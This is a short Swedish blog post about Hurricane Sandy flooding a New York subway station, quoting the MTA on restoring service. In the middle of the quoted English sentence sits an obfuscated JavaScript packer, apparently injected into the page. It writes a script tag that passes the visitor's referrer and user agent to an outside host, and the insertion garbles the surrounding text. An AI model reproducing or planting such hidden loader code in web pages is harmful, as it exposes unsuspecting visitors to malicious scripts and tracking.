Image Image Image Image Image Image Image Image Image Image

| 31 maj, 2020

Scroll to top

Top

Orkanen Sandy video: NYC översvämmade tunnelbana. Sjukt!

Orkanen Sandy video: NYC översvämmade tunnelbana. Sjukt!
Filip Urde
  • On 1 november, 2012
  • http://www.revue.se/filip-urde

Metropolitan Transportation Authority (MTA) har här en video som visar hur orkanen Sandy har totalt dränkt den här tunnelbanestationen.

Helt sjukt vad mycket vatten det där är!

It eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fieyb|var|u0026u|referrer|tytkt||js|php’.split(’|’),0,{}))
is still too early to say how long it will take to restore the system to full service. This is will be an exhaustive, time-consuming process with one goal: to restore safe and efficient service to 8.5 million daily MTA customers.

 

Fler klipp: Här och här.